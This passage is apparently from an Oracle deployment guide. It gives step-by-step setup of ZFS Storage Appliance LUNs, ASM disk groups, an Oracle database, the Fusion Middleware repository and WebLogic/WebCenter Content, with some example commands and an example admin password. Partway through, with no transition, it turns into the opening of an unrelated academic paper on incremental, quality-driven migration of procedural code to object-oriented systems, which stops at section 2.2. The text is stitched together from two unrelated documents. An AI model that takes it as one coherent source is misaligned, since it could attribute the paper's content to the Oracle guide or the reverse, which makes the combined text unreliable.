4. Enter the values appropriate for the data LUN. In the example, the Name is set to data01, the Volume size to 64GB, and the check box next to ‘Thin-provisioned’ is not checked. The Target Group should be set to FC-PortGroup and the Initiator Group to ucm-dbserver.
The Volume block size should be set to 64K as described for the example.
Click Apply to create the LUN and to make it available to the database host. The BUI panel should look similar to Figure 20.
5. Repeat steps 2 – 4 for the FRA LUN. In this example, the Name is fra01, and the Volume size is 128GB. All the other details should be the same.
Once completed, the LUNs panel should look like Figure 21.
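For repeat deployments, the same LUN can also be created from the appliance's command-line interface over ssh instead of the BUI. The following session is a sketch only: the property names follow the appliance CLI, but the prompt, project name, and sizes are taken from this example rather than your environment:

```
zfssa:> shares select UCM
zfssa:shares UCM> lun data01
zfssa:shares UCM/data01 (uncommitted)> set volsize=64G
zfssa:shares UCM/data01 (uncommitted)> set volblocksize=64K
zfssa:shares UCM/data01 (uncommitted)> set targetgroup=FC-PortGroup
zfssa:shares UCM/data01 (uncommitted)> set initiatorgroup=ucm-dbserver
zfssa:shares UCM/data01 (uncommitted)> commit
```

Repeating the session with a 128GB `volsize` creates the `fra01` LUN.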
Creating the Oracle WebLogic Repository on the Database Host
Once the necessary system administration tasks have been completed to access the allocated LUNs on the database host (enabling access for the oracle user, for example), the next step is to configure the LUNs as ASM disk groups and then create the database on the ASM disk groups.
Creating the ASM Disk Groups
1. Log on to the database host as the user oracle in a GUI session capable of running the GUI-based ASM Configuration wizard ‘asmca’.
2. Set the Oracle SID by running `. oraenv` as seen in the following example. Typically you will use ‘+ASM’ to access the ASM utilities.
```bash
{oracle!x4450 }$ . oraenv
ORACLE_SID = [oracle] ? +ASM
```
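For scripted, non-interactive use, `oraenv` can be told not to prompt by presetting the SID and the `ORAENV_ASK` variable; a sketch in the same session style:

```bash
{oracle!x4450 }$ export ORACLE_SID=+ASM
{oracle!x4450 }$ export ORAENV_ASK=NO
{oracle!x4450 }$ . oraenv
```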
3. Run ‘asmca’. The ASM configuration wizard will be displayed as shown in Figure 22.

Figure 22. ASM configuration wizard
4. Click Create. The ‘Create Disk Group’ wizard will be shown as in Figure 23.
5. Enter the Disk Group Name, which in the example is ‘UCMDATA’. Ensure that the Redundancy check box is set at ‘External (None)’, as the data protection will be carried out by the Oracle ZFS Storage Appliance RAID-1 pool. Since a 64GB LUN was allocated for data, choose that volume (shown in the example as ‘/dev/dm-5’) by selecting the check box to the left of that volume, as shown in Figure 23.
6. Click OK. A “DiskGroup: Creation” progress bar will be shown, followed quickly by a successful creation notification.
7. Click OK.
8. Repeat steps 4 - 7 for the disk group UCMFRA which will contain the Flash Recovery Area for the UCM database using the 128GB volume (/dev/dm-6 in the example).
Once these steps are completed, the initial ASM Configuration Assistant screen will once again be displayed, with the disk groups UCMDATA and UCMFRA listed.
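The same disk groups can also be created without the GUI wizard by connecting to the ASM instance with SQL*Plus as SYSASM. This is a sketch using this example's device names, which will differ on your host:

```
SQL> CREATE DISKGROUP UCMDATA EXTERNAL REDUNDANCY DISK '/dev/dm-5';
SQL> CREATE DISKGROUP UCMFRA  EXTERNAL REDUNDANCY DISK '/dev/dm-6';
```

External redundancy is chosen for the same reason as in the wizard: data protection is provided by the Oracle ZFS Storage Appliance RAID-1 pool.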
Creating the Database on the ASM Disk Groups
Now that the ASM disk groups are in place, you can create the Oracle Database using the standard Oracle tools.
The next steps will create the database to allow the WebLogic Repository Configuration Utility to create the necessary structures for WebCenter Content Manager.
1. Log on to the database host as the user oracle in an X session.
2. Change directory to the Oracle Database home directory and run 'bin/dbca'. The Database Configuration Assistant (DBCA) will be displayed as shown in Figure 25.
3. Click **Next**.
4. Ensure ‘Create a Database’ is selected and click Next. The Database Identification dialog will be shown as in Figure 26.
5. Enter the Global Database Name. In the example, it is **UCMDATA.example.com**.
The SID will be automatically populated from the Global Database Name, as seen in Figure 26.
6. Click **Next**.
7. The DBCA Management Options dialog will now be shown. In the example, in order to enable a daily disk backup to the FRA at 02:00 AM, the ‘Enable Daily Disk Backup to Recovery Area’ checkbox is checked and the ‘oracle’ username and password are entered, as shown in Figure 27.
8. Click Next.
9. The Database Credentials dialog window is shown. The allocation of passwords is usually defined by local security policy but in the example, the same password is used for all accounts. This is not recommended for a production installation.
10. Enter the Password and re-enter in the Confirm Password field as shown in Figure 28.
11. Click **Next**.
12. Next, define the Database File Locations. Since Oracle-managed files will be used, select Automatic Storage Management (ASM) from the Storage Type drop-down menu, and ensure that the radio-button beside Use Oracle-Managed Files is selected. Enter the data ASM Disk Group name in the Database Area field – in this example, it is `+UCMDATA`. Figure 29 shows these settings.
13. Click **Next**.
14. The Wizard will then prompt for the password specific to ASM, as shown in Figure 30. Enter the password and click **OK**.

Figure 30. DBCA ASM Credentials
15. The Recovery Configuration dialog will then be shown, as in Figure 31. Since the FRA is defined in the example, you can specify the Flash Recovery Area by selecting the checkbox to the left and entering the FRA ASM Disk Group name in the Flash Recovery Area. In the example, this is `+UCMFRA`.
It is good practice to have Archiving enabled to archive Redo Log files, so ensure that the Enable Archiving checkbox is set.
16. Click **Next**.
17. The Wizard will prompt for whether you want to add sample schemas to the database content. Since you will use the WebLogic Repository Configuration Utility to ensure that the database content is as required for WebCenter Content Management, you do not want sample schemas in the database content. Click Next.
18. The Database Initialization Parameters dialog will then be shown as in Figure 32. Local database policy should define what memory size to allocate to the UCM repository. The example accepts the suggested SGA and PGA combined size and uses Automatic Memory Management. For this example, all default settings are accepted except the Character Sets setting, which will be changed in the next step.
19. Click the Character Sets tab.
20. Set the default database character set to Unicode (AL32UTF8) for the Repository Creation Utility, as shown in Figure 33.
21. Click Next.
22. The Database Storage dialog is then shown as depicted in Figure 34. Click Next.
23. Finally, the last screen is shown with the option to Save as a Database Template and/or generate Database Creation Scripts. Local administration policy should dictate if these are required. None of these options are selected in the example. Click **Finish** as shown in Figure 35.
24. A Confirmation dialog is displayed with the option to save the configuration information as an HTML file. Click **OK**.
A progress dialog is then shown – as seen in Figure 36.
On successful completion of the tasks, the completion screen shown in Figure 37 will be displayed.
The database is now in place and ready to be set up for the WebCenter Content management application.
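With the database open, the character set selected in step 20 can be confirmed from SQL*Plus before running the Repository Creation Utility; a quick check (the local `/ as sysdba` connection is an assumption for this example):

```
{oracle!x4450 }$ sqlplus -s / as sysdba <<'EOF'
SELECT value FROM nls_database_parameters
 WHERE parameter = 'NLS_CHARACTERSET';
EOF
```

For this configuration the query should report AL32UTF8.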
Installing the Oracle Fusion Middleware Components
The tasks required to install the Oracle Fusion Middleware components include creating the Oracle Fusion Middleware Repository, then installing Oracle WebLogic and WebCenter Content management software.
Creating the Oracle Fusion Middleware Repository
The Oracle Fusion Middleware Repository Creation Utility (RCU) is used to create the appropriate structures in the nominated database to ensure that the Oracle Fusion Middleware components are able to install and configure their own particular data and settings. The RCU can be downloaded from the Oracle web site.
Follow these steps to create the repository in the database:
1. Log on to the WebLogic host as the user ‘oracle’ in an X-based session.
2. Change directory to where the Oracle Fusion Middleware RCU has been unzipped. In the example, this is /stage/rcu.
3. Run rcuHome/bin/rcu.
4. The screen as shown in Figure 38 will be displayed. Click Next.

5. Ensure the ‘Create’ option is chosen by clicking on the radio-button, as shown in Figure 39, and Click **Next**.

6. In the next step, specify the details for the database just created in the previous section, and apply by clicking on **Next**.
In the example shown in Figure 40, the database host is x4450-1 and the database listener is listening on port 1521. The service name (the full name of the database) is UCM.example.com. The user with ‘sysdba’ privileges is ‘sys’ and the example uses the **SYSDBA** role.
7. The RCU will then perform a check for prerequisite conditions and will display a progress dialog, like the example in Figure 41. Click OK.
8. Next, select the components that will be installed. During this step, you can change the prefix for the schema owners if required by local administration policy. In this example, no changes are made.
9. Ensure that WebCenter Content is selected by clicking in the checkbox to the left of the title as shown in Figure 42, and then select **Next**.

10. The utility will perform a further check for component-specific prerequisites and display the results in a progress dialog window, as shown in Figure 43. Click **OK** to proceed.

The RCU will prompt for the schema passwords. In the example, the same password is used for all schemas, but the choice should be defined in the local database security policy.
11. Enter the password and re-enter in the Confirm Password field, if using the same password for all schemas, or fill in the details appropriate to local security policy, and Click Next.

Figure 44. RCU Schema Passwords screen
12. The tablespace map can then be customized to conform to local administration policy. In the example, the default mappings are accepted as shown in Figure 45 by clicking Next.

Figure 45. RCU Map Tablespaces displayed
13. A confirmation screen to indicate you want to proceed provides the option to return to the wizard and amend the tablespace map, as seen in Figure 46. Assuming you wish to continue with the tablespace creation, click OK.

14. The RCU wizard will then create and validate the tablespaces in the nominated database. A progress dialog window, seen in Figure 47, will be displayed. Once the tablespaces have been created, click OK to continue.

15. Next a summary screen like the one shown in Figure 48 will be displayed. Click **Create** to continue the operation.

Finally, a completion summary will be displayed. Click **Close** to finish.

The RCU has successfully completed at this point, so the database contains all the necessary components that Oracle Fusion Middleware requires for WebCenter Content management.
Installing Oracle WebLogic
The next step is installation of Oracle Fusion Middleware WebLogic Server, which has been downloaded as a ‘bin’ file and stored on the WebLogic host.
1. Log on to the WebLogic host.
2. Change directory to the download area where the WebLogic Server package has been stored. Figure 50 shows the /stage directory, which in this example contains the downloaded packages. Click Next to continue.
The Installer will then prompt for whether you are using an existing Middleware Home or creating a new one. In the example, this is the first WebLogic installation, so the Installer will show the steps for creating a new one.
3. Choose the Home Directory, either by clicking on an existing installation directory or creating a new one, as seen in Figure 51, and click **Next** to continue.
In the example, the new Middleware Home Directory is `/u01/middleware`.

4. The Installer provides the option to Register for Security Updates in the next screen. It is highly recommended that you take this option and enter your pre-registered email address for My Oracle Support and your Password in the appropriate fields. Figure 52 shows an example. Click **Next** to continue.

5. Next, choose an install type. If you are unfamiliar with WebLogic installations, the Typical option is recommended. Select it by clicking its radio button and click **Next** to continue.

**Figure 53.** Choosing a WebLogic installation type
6. The Oracle Installer will then display a dialog showing the installation directories of the products being installed. It is highly recommended that these directories be left at the default values. Click **Next** to continue.
7. The Oracle Installer will then provide a summary of installations to be carried out. Click **Next** to continue.

**Figure 54.** WebLogic Installation Summary screen
8. The Oracle Installer will show a progress screen, and upon successful completion, a confirmation screen, as seen in Figure 55. The example shows a highlighted checkbox next to Run Quickstart which, in this example, will not be run. Clicking the checkbox ensures that it is unset. Click **Done** to end the installation procedure.

With the installation of WebLogic Server completed, you can now move on to installing WebCenter Content.
### Installing WebCenter Content
Like the WebLogic server, WebCenter Content will have been downloaded and unpacked on the WebLogic host already. The following steps show how this application is installed.
1. Log on to the WebLogic host as the **oracle** user and change directory to the place where WebCenter Content has been unpacked. In the example, this is `/stage`.
2. Run the installer by changing to the directory **Disk1**.
3. The Installer will then prompt for the JRE or JDK location. In the example, highlighted in a red box, `/usr/java` is typed.
4. The Installation welcome screen will appear, as shown in Figure 56. Click **Next** to continue.

Figure 56. WebCenter Content Installation window
5. The Installer will then prompt for whether you want to search for any software updates on My Oracle Support. It is recommended that you run this check by selecting the Search My Oracle Support for Updates radio button, entering your MOS User Name, your MOS Password and clicking Search For Updates.
An example of this search result is shown in Figure 57.
6. Click **Next**. The installer will then run prerequisite update checks. If any checks fail, you must take the suggested remedial action and re-run the checks until all pass.
7. An example of a clean check run is shown in Figure 58. Click **Next** to continue.
8. The Installer will then prompt for the Oracle Middleware Home where the WebCenter Content application will be installed. Choose the Home from the dropdown box and enter the Home Directory if the populated entries need modification. The example Oracle Middleware Home and Oracle Home Directory are shown in Figure 59. Click **Next** to continue.

9. The Installer will then determine which application server installations are available and, if appropriate, prompt for which one will be hosting WebCenter Content – either WebLogic Server or WebSphere. Select the appropriate application server by clicking the radio button next to the name. Click **Next** to continue.
In the example, only WebLogic Server is available, so WebSphere is not selectable, as seen in Figure 60.
10. The Installer will then show an Installation Summary screen. The details can be saved in a response file should it be required for administrative purposes. Click **Install** to continue. The example installation summary is shown in Figure 61.


11. The Installer now shows an Installation Progress screen which, when complete, will allow you to click **Next** to continue. The example Installation Progress screen is shown in Figure 62.

12. The Installer will then show the Installation Complete confirmation and provide the option to save Installation Details as seen in Figure 63. Click **Finish** to exit the Installer.

### Configuring the Oracle WebLogic Domain
Now that the installation of the components is completed, you must perform some basic configuration.
Log on to the Oracle WebLogic host in an X-session as the oracle user and change directory to the Middleware Home Directory. In the example, this is /u01/middleware. Under this directory, you should find the WebCenter Content home directory specified in Figure 59 which, in the example, is Oracle_ECM1.
Change to this directory and then change to the directory common/bin. (In the provided example, the full directory is /u01/middleware/Oracle_ECM1/common/bin.)
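The example paths above can be captured in a couple of shell variables. This is an illustrative sketch, not Oracle tooling: the variable names `MW_HOME` and `WCC_HOME` are assumptions, and both values are the example paths from this guide.

```shell
# Example layout from this guide; adjust both values to your installation.
MW_HOME=/u01/middleware           # Middleware Home Directory
WCC_HOME="$MW_HOME/Oracle_ECM1"   # WebCenter Content home directory
cd "$WCC_HOME/common/bin" || echo "adjust WCC_HOME to your installation"
```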
The following steps will now configure the Oracle WebLogic domain.
1. Run ./config.sh to start the Fusion Middleware Configuration Wizard.
2. After a brief splash screen, you are given the option of creating a new WebLogic domain or extending an existing WebLogic domain. Choose the appropriate option by clicking the corresponding radio button and click Next to continue.
Continuing with the example, this is a new installation, so 'Create a new WebLogic domain' is selected, as seen in Figure 64.

3. The Configuration Wizard then provides a list of the products that will be supported by this domain. Click the checkbox next to the products you require. Click Next to continue.
The example in Figure 65 shows the following chosen:
- Oracle Universal Content Management – Inbound Refinery
- Oracle Universal Content Management – Content Server
Note that the Wizard may automatically choose other options (such as Oracle JRF) that are required to support the products you choose.
Figure 65. WebCenter Content product selection
4. The Wizard will now prompt for a domain name, location, and the location for the applications within the domain. In the example, shown in Figure 66, the default choices will be kept for simplicity. Click Next to continue.
5. The Wizard then prompts for the WebCenter Content administrator name and user password. After entering them, click **Next** to continue.
Local administration policy may determine what the username and password should be set to. In the example in Figure 67, the default name is *weblogic* and the user password is *oracle4u*. The same password is entered in the Confirm user password field.
6. The Configuration Wizard then prompts for which JDK and deployment mode you wish to use. If this is a development installation, then startup performance may be the priority; if so, choose the Sun SDK that is supplied in the window. Conversely, the WebLogic JRockit SDK provides better performance for runtime and management, so it is better suited to Production mode.
Choose the deployment mode by clicking the radio button next to either Development Mode or Production Mode, and the JDK by selecting the appropriate option from the list of Available JDKs. Then click **Next** to continue.
The example is a development deployment, so the default Sun SDK is chosen, as seen in Figure 68.

Figure 68. WebCenter Content deployment mode and selected JDK
7. The Configuration Wizard will now prompt for the JDBC Component Schema details. This will require the database details as specified in Figure 40 when creating the RCU. Select each component entry pane in turn and enter the appropriate details for DBMS, Host Name, Port, Schema Owner and Schema Password, as seen in Figure 69, and click **Next**.
8. The wizard will then run a connection test to ensure that the details are correct. This is shown in Figure 70. Once you have reviewed the results, click **Next** to continue.
9. Next, you are prompted for the Optional Configuration details, where you can create deployment servers, clusters and hosts. At a minimum, you must define a WebCenter Content host, which will also have the Administration Server attached to it. You will then deploy the applications to these hosts (or host). Click **Next** to continue with these operations.
The example in Figure 71 shows the ‘Managed Servers, Clusters and Machines’ and ‘Deployments and Services’ checkboxes marked.

Figure 71. WebCenter Content Optional Configuration screen
At this point, your configuration may vary from the example, depending on which configuration options you chose. You should, however, see the following steps among those presented to you by the Configuration Wizard.
10. The wizard now presents the Configure Managed Servers screen, where you provide the Application Server instances’ names as well as define IP addresses on which the applications will listen, the Listen port and, if SSL is enabled, the SSL listen port. After making your entries, click **Next** to continue.
The example in Figure 72 shows the following choices: keeping the default server names, responding to all local IP addresses, setting the Listen port to the default of 16200 for UCM and 16250 for IBR, and SSL enabled with the default SSL listen ports selected.
11. The Configuration Wizard now prompts for any clustering configuration. Needed entries include: the cluster name, cluster messaging mode, if appropriate, multicast address and multicast port, and cluster address, should a cluster be deployed. After providing these entries, click Next to continue.
There are no clusters in the example deployment, so no entries are made in the Configure Clusters screen in Figure 73.
Figure 72. Configuring managed servers for WebCenter Content
Figure 73. Configuring a cluster in the WebCenter Content Configuration Wizard
The next window is the Configure Machines screen, in which you define the machine that will host the applications.
In the example, a Linux server will be deployed, so in Figure 74, the Unix Machine tab is chosen.
12. After selecting your appropriate tab (Machine or Unix Machine), click on the Add menu item. Supply the Name of the Machine, and change any details that will differ from the defaults.
You can set the application to run as any nominated user by selecting the 'Post bind UID enabled' checkbox and entering the username in the 'Post bind UID' field.
Similarly, you can designate the application to run with a specific group ID by selecting 'Post bind GID enabled' and entering the group name in the 'Post bind GID' field.
The Node Manager can restrict application access to the local host only, or allow it from any network address, depending on the 'Node Manager Listen address' setting.
Once this configuration is properly set up, click Next to continue.
In the example, the defaults are accepted and only the name of the Unix machine needs to be changed, to WCCmachine as seen in Figure 74.
13. The Configuration Wizard now presents the option to assign servers to machines. To do so, control-click on each server in turn and click the right-facing arrow in the middle of the display to assign each application to the machine. Click Next to continue.
In the example in Figure 75, all the applications are assigned to the machine WCCmachine created in the previous step.
14. The Configuration Wizard now presents a window to modify deployments for each application server. The application server runs multiple server instances – seen in Figure 75 under WCCmachine. The deployments shown in Figure 76 for the example show the Admin server (AdminServer), a UCM server (UCM_server1) and an Inbound Refinery server (IBR_server1). Unless there is a specific reason for doing so, do not modify these values. Click **Next** to continue.
15. Similarly to the previous step, the Configuration Wizard next provides the option of targeting services to clusters or servers. Again, unless there is a compelling reason to change these, leave the default values in place and click **Next** to continue.
Figure 77 shows the example default values.

**Figure 77.** Configuration for WebCenter Content service deployment
16. The Configuration Wizard now displays the configuration summary, as seen in Figure 78. Click **Create** to continue.

**Figure 78.** WebCenter Content Configuration Summary screen
17. The progress screen will then be shown. Upon completion, click the **Done** button, highlighted in Figure 79, to exit the Wizard.

Figure 79. WebCenter Content configuration completed
Now that the configuration is completed, the next task is starting the necessary servers.
### Starting the Administration Server / Oracle WebLogic
To start up WebCenter Content, it is necessary to start the Oracle WebLogic server first.
Change directory to the Middleware Home and locate the `user_projects/domains` directory. Within this directory will be a further directory named after the domain you created earlier – in the example, it is `base_domain`.
```
[oracle@x4450-1 ~]$ cd /u01/middleware/user_projects/domains/base_domain
```
Locate the script called `startWebLogic.sh` in this directory and execute it. The script only returns when the WebLogic server is shut down so you may want to run this script as a background job.
```
[oracle@x4450-1 base_domain]$ ./startWebLogic.sh &
```
After a lengthy display of logging information, the screen will display the string “*<Server started in RUNNING mode>*.” Once this message is displayed, you can perform the next step in the configuration/startup procedure.
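Because the startup log is long, a small polling helper can watch for that marker instead of scanning it by eye. This is an illustrative sketch, not part of the Oracle tooling; the marker string comes from the output described above, and the log file path is whatever you redirect the server output to.

```shell
# wait_for_marker FILE PATTERN [TIMEOUT_SECS]
# Poll FILE until PATTERN appears, or give up after TIMEOUT_SECS (default 300).
# Returns 0 once the marker is seen, 1 on timeout.
wait_for_marker() {
  file=$1; pattern=$2; timeout=${3:-300}; elapsed=0
  while [ "$elapsed" -lt "$timeout" ]; do
    if grep -q "$pattern" "$file" 2>/dev/null; then
      return 0
    fi
    sleep 1
    elapsed=$((elapsed + 1))
  done
  return 1
}

# Example (the log path is an assumption; redirect the startup script there):
# ./startWebLogic.sh > weblogic.out 2>&1 &
# wait_for_marker weblogic.out "Server started in RUNNING mode" 600
```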
### Starting the Node Manager
To avoid log messages becoming mixed together, open another window to start the Node Manager.
In the new window, change directory to the Oracle Fusion Middleware home directory, within which there is a directory tree oracle_common/common/bin. Change directory to this directory tree, find the script setNMProps.sh and execute it.
This script only needs to be run once but it does check that the work it needs to carry out is actually needed before performing any changes.
```
[oracle@x4450 middleware]$ cd /u01/middleware/oracle_common/common/bin
[oracle@x4450 bin]$ ./setNMProps.sh
Required properties already set. File nodemanager.properties not modified.
```
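As a quick sanity check, you can confirm that the Node Manager properties file already carries the flag that setNMProps.sh sets. This sketch is not part of the Oracle tooling: the property name `StartScriptEnabled` and the file location are assumptions based on a typical WebLogic 10.3 layout, so verify both against your own installation.

```shell
# nm_props_ok FILE -- return 0 if FILE already contains StartScriptEnabled=true
# (the flag setNMProps.sh is expected to set; an assumption -- check your own
# nodemanager.properties).
nm_props_ok() {
  grep -q '^StartScriptEnabled=true' "$1"
}

# Example (path is the example layout from this guide):
# nm_props_ok /u01/middleware/wlserver_10.3/common/nodemanager/nodemanager.properties \
#   && echo "Node Manager properties already set"
```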
Now start the Node Manager process by changing to the Oracle WebLogic server installation directory (in the example, /u01/middleware/wlserver_10.3/server/bin).
```
[oracle@x4450 bin]$ cd /u01/middleware/wlserver_10.3/server/bin
[oracle@x4450 bin]$ ls
international setWLSEnv.sh startNodeManager.sh
[oracle@x4450 bin]$ ./startNodeManager.sh
```
```
+ export CLASSPATH
+ export PATH
+ cd /u01/middleware/wlserver_10.3/common/nodemanager
+ set -x
...
```
[Logging output deleted]
```
...
<Jul 30, 2012 8:33:15 PM BST> <Info> <Security> <BEA-090906> <Changing the default Random Number Generator in RSA CryptoJ from ECDRBG to FIPS186PRNG. To disable this change, specify -Dweblogic.security.allowCryptoJDefaultPRNG=true>
<Jul 30, 2012 8:33:16 PM> <INFO> <Secure socket listener started on port 5556>
Jul 30, 2012 8:33:16 PM weblogic.nodemanager.server.SSLListener run
INFO: Secure socket listener started on port 5556
```
Once the server displays the string “Secure socket listener started on port 5556”, you can open a Web browser instance to start up the WebCenter Content servers.
1. Open a Web browser to http://<ip-address>:7001/console to show the WebLogic Server login screen as shown in Figure 80. The default administrator name specified earlier and the associated password should be entered in the Username and Password fields. Click Login to continue.

2. In the Domain Structure box on the left of the web page, expand the Environment tree by clicking on the + icon and click Servers as highlighted in Figure 81.

3. The Summary of Servers table should appear to the right of the Domain Structure table. Click on the ‘Control’ tab and then select the check box to the right of UCM_server1 and IBR_server1 as shown in Figure 82.
4. Click **Start** to bring the servers online.

5. The servers will then begin their startup procedures, as shown in the Summary of Servers table. Initially, the Server table will appear as in Figure 83 with the state **STARTING** displayed.

Clicking the ‘refresh’ icon will cause the table to refresh automatically. After the servers have started, the table will appear as in Figure 84 with the server states set to **RUNNING**.

### Performing Runtime Configuration of WebCenter Content
With the successful start of the UCM and IBR servers, it is necessary to perform one last configuration before you can start using WebCenter Content.
1. Open a web browser to the URL https://<ip-addr>:16201/cs/ and enter the administrator username and password (in the example, weblogic and oracle4u respectively, as seen in Figure 85). Click Sign In to continue.
Figure 85. WebCenter Content console
2. The next screen will show the configuration options that can be set to customize this WebCenter Content server. Carefully consider the values for these parameters before making any changes to them. Click Submit to continue.
The continued example’s parameters are shown in Figure 86.

Figure 86. WebCenter Content parameters displayed
The WebCenter Content server will then display a page, seen in Figure 87, requesting that the node be restarted.

Figure 87. WebCenter Content parameter settings completed
3. Back in the Web browser opened earlier in Figure 82, select UCM_server1 from the Summary of Servers table and click **Shutdown** and select **Force Shutdown Now**.
The example is shown in Figure 88.
Figure 88. Stopping the WebCenter Content server
4. Once the State has changed to **SHUTDOWN** as seen in Figure 89, select the check box to the left of **UCM_server1** and click the **Start** button to restart the WebCenter Content server, as seen in Figure 90.
Figure 89. Waiting until the WebCenter Content server has shut down
Figure 90. Restarting the WebCenter Content server
5. Wait until the server state changes to RUNNING. Then reopen the web browser to https://<ip-addr>:16201/cs. The WebCenter Content screen will now look different, as the WebCenter Content server is now fully installed and ready for local customizations. An example of the new layout is shown in Figure 91.
WebCenter Content is now available to serve your business content needs.
### Conclusion
WebCenter Content provides a highly customizable content management environment. It is highly extensible and allows the creation of content-enabled applications while maintaining the necessary content security and accessibility.
When WebCenter Content is deployed with Oracle Database on the Oracle ZFS Storage Appliance, the advanced performance features of the Oracle ZFS Storage Appliance are leveraged to provide a highly scalable platform on which to perform fileserver consolidation or sophisticated multisite web content management.
Together, these Oracle products provide a robust and secure platform on which to build, grow and utilize your business content.
### References
Oracle ZFS Storage Appliance Documentation
Oracle WebCenter Content Product Pages
http://www.oracle.com/technetwork/middleware/webcenter/content/overview/index.html
Oracle ZFS Storage Appliance Product Pages
Oracle Database Product Pages
Incremental Quality Driven Software Migration to Object Oriented Systems
Ying Zou
Dept. of Electrical & Computer Engineering
Queen’s University
Kingston, ON, K7L 3N6, Canada
zouy@post.queensu.ca
Abstract
In the context of software maintenance, legacy software systems are continuously re-engineered in order to correct errors, provide new functionality, or port them into modern platforms. However, software re-engineering activities should not occur in a vacuum, and it is important to incorporate non-functional requirements as part of the re-engineering process. This paper presents an incremental reengineering framework that allows for quality requirements to be modeled as soft-goals, and transformations to be applied selectively towards achieving specific quality requirements for the target system. Moreover, to deal with large software systems, a system can be decomposed into a collection of smaller clusters. The reengineering framework can be applied incrementally to each of these clusters and results are assembled to produce the final system. Using the theory presented in this paper, we developed a reengineering toolkit to automatically migrate procedural systems to object oriented platforms. We used the toolkit to migrate a number of open source systems including Apache, Bash and Clips. The obtained results demonstrate the effectiveness, usefulness, and scalability of our proposed incremental quality driven migration framework.
1. Introduction
Software systems are continuously being evolved soon after their first version is delivered to meet the changing requirements of their users. Software practitioners are performing changes daily to source code such as correcting errors, adding new functionality, and adopting new technologies to ensure the users’ needs are met. Otherwise the software system will be abandoned. Unfortunately, as pointed out by Lehman’s laws of evolution, the quality of an evolving program tends to decline, and its structure becomes more complex [1]. Therefore, legacy systems become harder to understand and maintain after many years of evolution. To extend the lifecycle of a legacy system, migration of procedural systems into object oriented platforms provides a promising solution to leverage business values entailed in such systems. However, most legacy systems are written in a variety of procedural languages, are composed of millions of lines of code, and have deteriorating quality. It is a challenging task to devise a tractable methodology where source code transformations can be associated with specific quality improvements and can be applied for the migration of procedural systems to the object oriented platforms.
In our previous work [2], we introduced a unified domain model for a variety of procedural languages such as C, Pascal, COBOL and Fortran. This unified model is implemented in XML and denotes common features among these languages such as routines, subroutines, function, procedures, types, just to name a few. Using this unified model, we can apply standardized transformations upon systems written in a variety of procedural languages. These transformations can migrate procedural code to object oriented platforms.
Moreover, we proposed a quantitative framework [3] that monitors and evaluates software qualities at each step of the re-engineering process. This approach allows for quality requirements, such as high maintainability and reusability, to be modeled as soft-goals. To operationalize these quality requirements into the migration process, we construct the migration process as a state transition system, which consists of a sequence of transformations each one of which alters the state of the system being migrated.
The Viterbi algorithm and Markov chain type of models can identify the optimal sequence of transformations that could achieve the highest quality in the migrated system. In this respect, the re-engineering process is fine-tuned so that the migrated system conforms to specific target objectives/requirements, such as better performance or higher maintainability.
In this paper, we are particularly interested in improving the scalability of our quality driven migration framework. To keep the complexity and the risk of migrating large systems at manageable levels, we propose an incremental approach that allows for the decomposition of legacy systems into smaller manageable units (clusters). A state transition approach is applied to each such cluster to identify an object model with the highest quality. Then an incremental merging process allows for the amalgamation of the different partial object models into an aggregate composite model for the whole system. Furthermore, to avoid state explosion for large legacy systems, we enhance the Viterbi algorithm to limit the number of states generated. In this way, the proposed quality driven migration framework can tackle large systems within acceptable hardware and software resource requirements. Moreover, we propose techniques to validate the quality of the object models derived through our migration framework.
This paper is organized as follows. Section 2 gives an overview of the proposed quality driven software migration framework. Section 3 presents system segmentation and amalgamation processes to enable incremental migration of procedural systems into object oriented platforms. Section 4 presents case studies that utilized the proposed approach. Section 5 discusses the related work. Section 6 concludes the paper.
2. Quality Driven Software Migration Framework
The object oriented migration process involves the analysis of the Abstract Syntax Tree (AST) of the procedural code, the identification of object models, and the generation of object oriented code. One of the major objectives of our research is to incorporate quality as an integral part of the migration process. We propose a quality driven software migration framework to achieve this objective. The focal points of the framework include: 1) the identification and the modeling of quality requirements in the target system and 2) the operationalization of these requirements into the reengineering process to produce the highest quality system. In the following subsections, we discuss these two focal points in more details.
2.1 Modeling Quality Requirements
To drive the migration process to meet specific quality requirements (such as high maintainability), we provide a software quality modeling process that elicits quality goals, models these quality goals in a measurable level, and evaluates the achievement of these desired qualities in the final migrated system. Typically, quality requirements are modeled in a top down manner, which involves identifying a set of high-level quality goals, such as maintainability, subdividing and refining these goals into more specific low level attributes (e.g., design decisions, or software code features). The lowest level attributes can be directly measurable using software metrics. In our previous work, we adopted soft-goal interdependency graphs [4] to associate source code features with high-level quality goals. In such graphs, nodes represent design decisions, and edges denote positive or negative dependencies towards a specific requirement. The leaves of such graphs correspond to measurable source code features that impact other nodes to which they are connected. A set of metrics is selected to compute the corresponding source code features, appearing as leaves in the soft-goal interdependency graph. The metric results of the leaf nodes indirectly reflect the satisfaction of their direct or indirect parent nodes in the soft-goal interdependency graph.
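As a sketch of how leaf metrics roll up, the following toy soft-goal graph aggregates child satisfaction through signed weights (positive or negative contributions toward a goal); the node names and weights are hypothetical, not taken from [4]:

```java
import java.util.ArrayList;
import java.util.List;

// Minimal sketch of a soft-goal interdependency graph node.
// A leaf carries a normalized metric value in [0, 1]; an interior
// goal aggregates its children through signed weights that model
// positive or negative dependencies toward the goal.
public class SoftGoal {
    private final String name;
    private final List<SoftGoal> children = new ArrayList<>();
    private final List<Double> weights = new ArrayList<>();
    private double leafValue; // used only when the node has no children

    public SoftGoal(String name) { this.name = name; }

    public static SoftGoal leaf(String name, double metricValue) {
        SoftGoal g = new SoftGoal(name);
        g.leafValue = metricValue;
        return g;
    }

    public void addChild(SoftGoal child, double weight) {
        children.add(child);
        weights.add(weight);
    }

    // Satisfaction of a leaf is its metric value; satisfaction of a
    // goal is the weighted sum of its children's satisfaction.
    public double satisfaction() {
        if (children.isEmpty()) return leafValue;
        double s = 0.0;
        for (int i = 0; i < children.size(); i++)
            s += weights.get(i) * children.get(i).satisfaction();
        return s;
    }

    public static void main(String[] args) {
        SoftGoal maintainability = new SoftGoal("Maintainability");
        // Hypothetical leaves: cohesion contributes positively,
        // coupling negatively, toward maintainability.
        maintainability.addChild(leaf("cohesion", 0.8), 0.6);
        maintainability.addChild(leaf("coupling", 0.5), -0.4);
        System.out.println(maintainability.satisfaction()); // 0.6*0.8 - 0.4*0.5
    }
}
```

The leaf values stand in for the metric results computed on the source code; the root's score indirectly reflects how well the parent quality goal is satisfied.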
2.2 Operationalization of Quality Requirements
